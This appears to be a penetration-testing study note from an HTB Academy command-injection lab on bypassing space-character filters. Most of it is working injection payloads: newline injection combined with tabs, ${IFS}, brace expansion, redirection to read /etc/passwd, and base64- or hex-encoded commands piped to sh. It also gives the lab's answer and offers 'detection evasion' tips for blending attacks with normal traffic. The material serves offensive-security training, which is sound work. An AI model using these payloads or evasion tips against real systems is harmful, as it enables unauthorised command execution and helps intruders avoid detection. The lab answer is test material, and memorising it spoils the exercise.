Bypassing Space Filters
π«β‘οΈβ Space Evasion: Comprehensive techniques for bypassing space character filters in command injection attacks
Overview
Space characters are commonly blacklisted in input validation filters, especially when the expected input shouldn't contain spaces (like IP addresses). However, there are numerous methods to achieve command separation and argument passing without using actual space characters.
This section demonstrates multiple space bypass techniques using Linux as the primary example, with Windows compatibility notes where applicable.
Focus: Practical space filter evasion methods with hands-on exploitation examples.
Bypass Blacklisted Operators
Confirming Newline Works
From our filter identification phase, we discovered that the newline character (\n / %0a) is not blacklisted while other operators are blocked.
Verification Test:
# Test newline operator
ip=127.0.0.1%0a
# Expected result: Normal ping output (β
Not blocked)
# Confirms newline can be used as injection operatorResponse Analysis:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0msKey Finding: Newline character works as injection operator on both Linux and Windows platforms.
Space Filter Detection
Testing Space Character
Attempted Payload:
ip=127.0.0.1%0a whoami
# URL encoded: ip=127.0.0.1%0a%20whoamiResponse:
Invalid inputIsolated Space Test:
ip=127.0.0.1%0a%20
# Testing just the space characterResult: Invalid input - Confirms space character (%20) is blacklisted.
Understanding Space Filter Logic
Common PHP Implementation:
$blacklist = [';', '&', '|', ' ', '\t', 'sh', 'bash', ...];
foreach ($blacklist as $character) {
if (strpos($_POST['ip'], $character) !== false) {
echo "Invalid input";
exit();
}
}Why Spaces Are Filtered:
Input validation - Expected inputs (IP addresses) shouldn't contain spaces
Command prevention - Spaces enable argument separation in commands
Security measure - Reduces attack surface for command injection
Space Bypass Techniques
Method 1: Tab Characters
Technique: Replace spaces with tab characters (\t / %09)
Why It Works:
Both Linux and Windows accept tabs between command arguments
Commands execute identically with tabs as with spaces
Tab character often not included in blacklists
Implementation:
# Original (blocked): 127.0.0.1%0a%20whoami
# Tab bypass: 127.0.0.1%0a%09whoami
ip=127.0.0.1%0a%09whoamiExpected Response:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
www-dataVerification: β Successfully bypassed space filter using tab character.
Method 2: Environment Variables ($IFS)
Technique: Use Linux Internal Field Separator environment variable
Understanding $IFS:
Default value contains space and tab characters
Automatic expansion replaces
${IFS}with its valueUniversal availability on Unix/Linux systems
Local Testing:
# Verify IFS contains space and tab
kabaneridev@htb[/htb]$ echo "$IFS" | cat -A
^I$
# Test command with IFS
kabaneridev@htb[/htb]$ ls${IFS}-la
total 8
drwxr-xr-x 2 kabaneridev kabaneridev 4096 Jul 13 10:30 .
drwxr-xr-x 3 kabaneridev kabaneridev 4096 Jul 13 10:30 ..Web Application Implementation:
ip=127.0.0.1%0a${IFS}whoami
# URL encoded: ip=127.0.0.1%0a%24%7bIFS%7dwhoamiExpected Response:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
www-dataVerification: β
Successfully bypassed space filter using ${IFS}.
Method 3: Bash Brace Expansion
Technique: Use Bash brace expansion feature for automatic spacing
Understanding Brace Expansion:
Automatic separation - Bash adds spaces between comma-separated values
No explicit spaces - Command contains no space characters
Argument processing - Each element becomes separate argument
Local Testing:
# Traditional command with spaces
kabaneridev@htb[/htb]$ ls -la
# Brace expansion equivalent (no spaces)
kabaneridev@htb[/htb]$ {ls,-la}
total 0
drwxr-xr-x 1 21y4d 21y4d 0 Jul 13 07:37 .
drwxr-xr-x 1 21y4d 21y4d 0 Jul 13 13:01 ..Web Application Implementation:
ip=127.0.0.1%0a{whoami}
# For commands with arguments:
ip=127.0.0.1%0a{ls,-la}Multi-Argument Example:
# Traditional: ls -la /etc/passwd
# Brace expansion: {ls,-la,/etc/passwd}
ip=127.0.0.1%0a{ls,-la,/etc/passwd}Additional Space Bypass Methods
Method 4: Redirection Operators
Technique: Use input/output redirection for spacing
# Using input redirection
cat</etc/passwd
# Using output redirection
ls>output.txt
cat<output.txt
# Web application usage
ip=127.0.0.1%0acat</etc/passwdMethod 5: Variable Assignment
Technique: Assign commands to variables without spaces
# Variable assignment without spaces
cmd=whoami;$cmd
# With arguments
cmd="ls -la";$cmd
# Web application usage
ip=127.0.0.1%0acmd=whoami;$cmdMethod 6: Base64 Encoding
Technique: Encode entire command to avoid problematic characters
# Encode command
echo "ls -la" | base64
# Result: bHMgLWxhCg==
# Execute encoded command
echo bHMgLWxhCg== | base64 -d | sh
# Web application usage
ip=127.0.0.1%0aecho${IFS}bHMgLWxhCg==|base64${IFS}-d|shMethod 7: Hex Encoding
Technique: Use hex encoding with printf
# Create space using printf
printf "\x20"
# Execute command with hex-encoded space
printf "ls\x20-la" | sh
# Web application usage
ip=127.0.0.1%0aprintf${IFS}"ls\x20-la"|shMethod 8: Alternative Separators
Extended Whitespace Characters:
\t β %09 β Tab
\n β %0a β Newline
\r β %0d β Carriage return
\v β %0b β Vertical tab
\f β %0c β Form feedTesting Extended Characters:
# Vertical tab
ip=127.0.0.1%0awhoami%0bls
# Form feed
ip=127.0.0.1%0awhoami%0cls
# Combined separators
ip=127.0.0.1%0awhoami%09%0alsHTB Academy Lab Solution
Challenge Requirements
Task: Execute the command ls -la and find the size of index.php file.
Known Constraints:
Newline (
\n/%0a) injection operator worksSpace characters are blacklisted
Need to bypass space in
ls -la
Solution Approaches
Method 1: Tab Character Bypass
ip=127.0.0.1%0als%09-laMethod 2: IFS Variable Bypass
ip=127.0.0.1%0als${IFS}-la
# URL encoded: ip=127.0.0.1%0als%24%7bIFS%7d-laMethod 3: Brace Expansion Bypass
ip=127.0.0.1%0a{ls,-la}Expected Output Analysis
Command Output:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
total 20
drwxr-xr-x 2 www-data www-data 4096 Jul 13 10:30 .
drwxr-xr-x 3 www-data www-data 4096 Jul 13 10:30 ..
-rw-r--r-- 1 www-data www-data 1613 Jul 13 10:30 index.php
-rw-r--r-- 1 www-data www-data 842 Jul 13 10:30 style.cssFile Size Identification:
index.php: 1613 bytes
style.css: 842 bytes
Answer: 1613
Advanced Bypass Combinations
Multi-Method Combinations
Combining Techniques:
# IFS + Brace expansion
{echo,${IFS},"Hello World"}
# Tab + Variable assignment
cmd=ls%09-la;$cmd
# Base64 + IFS
echo${IFS}bHMgLWxhCg==|base64${IFS}-d|shPlatform-Specific Methods
Linux-Specific:
# Process substitution
cat<(ls -la)
# Command substitution with IFS
$(echo${IFS}ls${IFS}-la)
# Here-string
cat<<<"ls -la"Windows CMD:
# Caret escape character
ls^-la
# Variable expansion
set cmd=ls -la && %cmd%Windows PowerShell:
# Tick escape
ls`-la
# String expansion
"ls -la" | Invoke-ExpressionSystematic Testing Methodology
Step-by-Step Approach
Phase 1: Confirm Working Injection
# Verify injection operator works
ip=127.0.0.1%0a
# Result: β
Normal ping outputPhase 2: Test Space Alternatives
# Test each bypass method
ip=127.0.0.1%0awhoami%09 # Tab
ip=127.0.0.1%0awhoami${IFS} # IFS
ip=127.0.0.1%0a{whoami} # Brace expansionPhase 3: Execute Target Command
# Apply working bypass to target command
ip=127.0.0.1%0a{ls,-la}Phase 4: Parse Results
# Extract required information from output
# Look for specific files and their sizesPayload Development Template
Progressive Complexity:
# Level 1: Basic injection
127.0.0.1%0acommand
# Level 2: Single argument
127.0.0.1%0acommand%09arg
# Level 3: Multiple arguments
127.0.0.1%0a{command,arg1,arg2}
# Level 4: Complex operations
127.0.0.1%0aecho${IFS}payload|base64${IFS}-d|shComprehensive Reference Table
Space Bypass Methods Comparison
Method
Syntax
URL Encoded
Platform
Reliability
Tab
\t
%09
Universal
High
IFS Variable
${IFS}
%24%7bIFS%7d
Unix/Linux
High
Brace Expansion
{cmd,arg}
%7bcmd,arg%7d
Bash
Medium
Vertical Tab
\v
%0b
Universal
Medium
Form Feed
\f
%0c
Universal
Low
Base64
echo X|base64 -d|sh
Complex
Unix/Linux
Medium
Hex Encoding
printf "cmd\x20arg"
Complex
Unix/Linux
Medium
Redirection
cat<file
cat%3cfile
Unix/Linux
High
Selection Strategy
Primary Methods (High Success Rate):
Tab character (
%09) - Universal compatibilityIFS variable (
${IFS}) - Reliable on Unix/LinuxBrace expansion (
{cmd,arg}) - Clean syntax
Fallback Methods:
Extended whitespace (
%0b,%0c) - When primary blockedEncoding methods - When characters are heavily filtered
Platform-specific - When environment is known
Detection Evasion Tips
Stealth Considerations
Avoid Common Patterns:
Don't always use the same bypass method
Vary payload structure between requests
Mix different techniques in single payload
Blend with Normal Traffic:
Use realistic command arguments
Avoid obviously malicious commands
Time requests to appear natural
Error Handling:
# Graceful degradation
{ls,-la}||{dir,/w}||echo${IFS}"fallback"Payload Obfuscation
Multi-Layer Encoding:
# Double encoding
echo cHdkCg== | base64 -d | sh
# Mixed methods
{echo,${IFS},cHdkCg==}|base64${IFS}-d|shThis comprehensive guide to space filter bypasses provides multiple reliable methods for maintaining command injection capabilities even when space characters are blacklisted, ensuring successful exploitation across various filtering scenarios.
Last updated